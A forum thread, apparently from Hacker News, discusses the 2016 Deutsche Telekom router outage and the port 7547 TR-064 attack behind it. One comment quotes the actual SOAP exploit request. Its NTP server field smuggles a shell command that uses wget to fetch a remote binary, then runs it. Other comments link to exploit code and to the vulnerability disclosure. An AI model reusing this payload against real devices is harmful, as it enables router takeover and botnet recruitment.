Deutsche Telekom says 900k fixed-line customers suffer outages

64 点作者 Bouncingsoul1超过 8 年前

11 条评论

raesene6超过 8 年前

So from <a href="https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759" rel="nofollow">https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execut...</a>- this appears to be an attack on an externally visible port (7547)- There is publicly available exploit code for this issue (<a href="https://www.exploit-db.com/exploits/40740/" rel="nofollow">https://www.exploit-db.com/exploits/40740/</a>)- There are at least 41 Million hosts on the Internet with that port open.Sounds like quite a few people are going to have a bad time over this, and I'm left once again shaking my head at how someone ships an Internet facing consumer device with an open port by default.....

评论 #13059630 未加载

martinald超过 8 年前

The level of attacks seems definitely to be ramping up.I think the main reason for this jump has been the fact attackers are starting to make significant money out of these attacks now - especially now they can accept funds easily via Bitcoin. Before I think attacks were mainly for the lulz or very sophisticated attackers with various goals, but there must be hundreds of millions of dollars in ransoms being paid out now.Nearly anyone can now start making very good money with some simple tools. And like any business people start innovating a lot quicker with a profit motive.

B3D4超过 8 年前

POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="<a href="http://schemas.xmlsoap.org/soap/envelope/"" rel="nofollow">http://schemas.xmlsoap.org/soap/envelope/"</a> SOAP-ENV:encodingStyle="<a href="http://schemas.xmlsoap.org/soap/encoding/">" rel="nofollow">http://schemas.xmlsoap.org/soap/encoding/"></a> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget <a href="http://l.ocal.host/2;chmod" rel="nofollow">http://l.ocal.host/2;chmod</a> 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...next version step Mirai?<a href="https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e488b84e07959472ed05755548efec90df82701e/analysis/1480335565/" rel="nofollow">https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e...</a>

评论 #13057214 未加载

评论 #13055731 未加载

Aaargh20318超过 8 年前

Anyone else who thinks 900k routers, running 900k identical firmware versions, with 900k identical copies of any exploitable bugs, running on a predictable IP-range might be a bit of a problem, from a security PoV ?I wish ISP's stopped providing routers with their connections, if only to prevent this kind of dangerous monoculture.

评论 #13055316 未加载

评论 #13055331 未加载

评论 #13056459 未加载

评论 #13057207 未加载

评论 #13055970 未加载

noir_lord超过 8 年前

What's scary about this is I have 100Mbps fiber at home.At some point 900,000 routers with 100Mbps fiber might be a realistic user base that would be tremendous amount of traffic to smack people and that's without considering amplification attacks and such.Thats assuming a volumetric attack, even just "request foo.co.uk every half second" would be catastrophic, 1.8 million requests per second would be a bit of a bugger to handle.

评论 #13056671 未加载

kriro超过 8 年前

I also remember reports that 110 and 112 calls (German emergency numbers) were down for four hours in some county recently due to technical issues on DTs part. I never saw an explanation what the exact cause was. Fire services and police handled it decently (iirc. stuff got routed to the next city and they increased patrol cars). Still a bit alarming that there's no fail over in place and these numbers basically rely on one company (probably routed in the fact that DT used to be state owned and is thus still implicitly trusted?).

fahrradflucht超过 8 年前

"Based on the error pattern, we cannot exclude the possibility that the routers have been targeted by external parties with the result that they can no longer register on the network." [0][0] <a href="https://www.telekom.com/en/media/media-information/archive/information-on-current-problems-444862" rel="nofollow">https://www.telekom.com/en/media/media-information/archive/i...</a> (this should be the threads link in my opinion)

评论 #13056361 未加载

aluhut超过 8 年前

> If problems persisted Deutsche Telekom suggested customers disconnect their routers from the networkActually they suggest you disconnect the router, wait a few seconds and then reconnect it.It's fixed now according to them.<a href="https://www.heise.de/newsticker/meldung/Grossstoerung-bei-der-Telekom-Die-Telekom-prueft-Hinweise-auf-Hackerangriff-3506044.html" rel="nofollow">https://www.heise.de/newsticker/meldung/Grossstoerung-bei-de...</a>

mgliwka超过 8 年前

The original disclosure of the vulnerability is also an interesting read: <a href="https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/" rel="nofollow">https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-...</a>

aibottle超过 8 年前

This is what you get for dumb and needless centralization of infrastructure inside a capitalistic system, which does not at all incentivize maintenance and providing security!

mcrae超过 8 年前

<pre><code> and it could not rule out "targeted external factors" as the reason </code></pre> Yes, and DT could also not rule out extra-terrestrial interference. But who cares?It seems any large-scale enterprise incident is blamed on some other nebulous third-party these days (Russia, 400 lb men in their beds..) in order shift blame elsewhere.Do the general public see through this?

评论 #13055323 未加载

评论 #13054986 未加载

评论 #13055004 未加载

评论 #13054978 未加载